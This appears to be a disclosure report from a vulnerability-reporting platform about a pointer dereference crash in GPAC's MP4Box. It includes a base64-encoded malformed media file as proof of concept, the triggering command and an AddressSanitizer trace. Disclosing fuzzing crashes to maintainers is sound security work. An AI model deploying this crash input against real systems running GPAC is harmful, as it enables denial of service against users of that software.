Untrusted Pointer Dereference in gpac/gpac
Valid
Reported on
Mar 8th 2022
Description
Null Pointer Dereference in gpac
Proof of Concept
Version:
~/fuzzing/gpac/gpac/bin/gcc/MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev15-g6c0f4ff03-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration:
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
poc
base64 poc
Q0dDMAAA//RkRDIAAgAQBQA////oA9z///91sSMAwERYRB1MAABbRERERERERP//dQHoAwAAAUMA
AAFEdHIB3QD9AAAA7gBC3QABQwAAAUR0cmFrOwAAAUEBCwAAGELdAP0AAALuAEL4AAFDRERERERE
RP//dQHoAwAAAQwAAABBAX//6APm////dQGxIwDARFhEHUwAAFtERERERERE
command:
./MP4Box -info poc
Result
~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Warning: Error parsing NAL unit
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1172475==ERROR: AddressSanitizer: SEGV on unknown address 0x00010000000d (pc 0x7f031b4ec838 bp 0x000000000002 sp 0x7ffca1f029b8 T0)
==1172475==The signal is caused by a READ memory access.
#0 0x7f031b4ec837 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
#1 0x7f031b4ec9d1 (/lib/x86_64-linux-gnu/libasan.so.5+0x12e9d1)
#2 0x7f031b4ec60b (/lib/x86_64-linux-gnu/libasan.so.5+0x12e60b)
#3 0x7f031b3ea141 (/lib/x86_64-linux-gnu/libasan.so.5+0x2c141)
#4 0x7f031b3e6e1f (/lib/x86_64-linux-gnu/libasan.so.5+0x28e1f)
#5 0x7f031b4cc0b1 in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10e0b1)
#6 0x7f031abc5655 in gf_list_add (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0xac655)
#7 0x7f031b0ca909 in naludmx_process (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x5b1909)
#8 0x7f031afa67ef in gf_filter_process_task (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48d7ef)
#9 0x7f031af944d3 in gf_fs_thread_proc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x47b4d3)
#10 0x7f031af9943a in gf_fs_run (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48043a)
#11 0x7f031ae07151 in gf_media_import (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x2ee151)
#12 0x5613ea17fdc2 in convert_file_info (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x3ddc2)
#13 0x5613ea16e6d2 in mp4boxMain (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x2c6d2)
#14 0x7f031a94b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#15 0x5613ea15b53d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x1953d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
==1172475==ABORTING
We are processing your report and will contact the
gpac
team within 24 hours.
a year ago
We have contacted a member of the
gpac
team and are waiting to hear back
a year ago
We have sent a
follow up to the
gpac
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
gpac
team.
We will try again in 10 days.
a year ago
to join this conversation